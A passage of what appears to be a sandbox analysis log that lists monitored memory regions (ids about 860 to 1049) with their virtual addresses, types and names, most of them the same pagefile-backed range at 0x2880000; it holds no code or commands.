"pagefile_0x0000000002880000" filename = "" Region: id = 860 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 861 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 862 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 863 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 864 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 865 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 866 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 867 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 868 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 869 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 870 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 871 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 872 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 873 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 874 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 875 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 876 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 877 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 878 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 879 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 880 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 881 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 882 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 883 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 884 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 885 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 886 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 887 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 888 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 889 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 890 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 891 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 892 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 893 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 894 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 895 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 896 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 897 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 898 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 899 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 900 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 901 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 902 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 903 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 904 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 905 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 906 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 907 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 908 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 909 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 910 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 911 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 912 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 913 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 914 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 915 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 916 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 917 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 918 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 919 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 920 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 921 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 922 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 923 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 924 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 925 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 926 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 927 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 928 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 929 start_va = 0x2880000 end_va = 0x2880fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 930 start_va = 0x2880000 end_va = 0x288ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002880000" filename = "" Region: id = 931 start_va = 0x4120000 end_va = 0x413ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 932 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 933 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 934 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 935 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 936 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 937 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 938 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 939 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 940 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 941 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 942 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 943 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 944 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 945 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 946 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 947 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 948 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 949 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 950 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 951 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 952 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 953 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 954 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 955 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 956 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 957 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 958 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 959 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 960 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 961 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 962 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 963 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 964 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 965 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 966 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 967 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 968 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 969 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 970 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 971 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 972 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 973 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 974 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 975 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 976 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 977 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 978 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 979 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 980 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 981 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 982 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 983 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 984 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 985 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 986 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 987 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 988 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 989 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 990 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 991 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 992 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 993 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 994 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 995 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 996 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 997 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 998 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 999 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1000 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1001 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1002 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1003 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1004 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1005 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1006 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1007 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1008 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1009 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1010 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1011 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1012 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1013 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1014 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1015 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1016 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1017 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1018 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1019 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1020 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1021 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1022 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1023 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1024 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1025 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1026 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1027 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1028 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1029 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1030 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1031 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1032 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1033 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1034 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1035 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1036 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1037 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1038 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1039 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1040 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1041 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1042 start_va = 0x2880000 end_va = 0x2880fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1043 start_va = 0x2880000 end_va = 0x288ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002880000" filename = "" Region: id = 1044 start_va = 0x4120000 end_va = 0x413ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 1045 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1046 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1047 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1048 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 1049 start_va = 0x2880000 end_va = 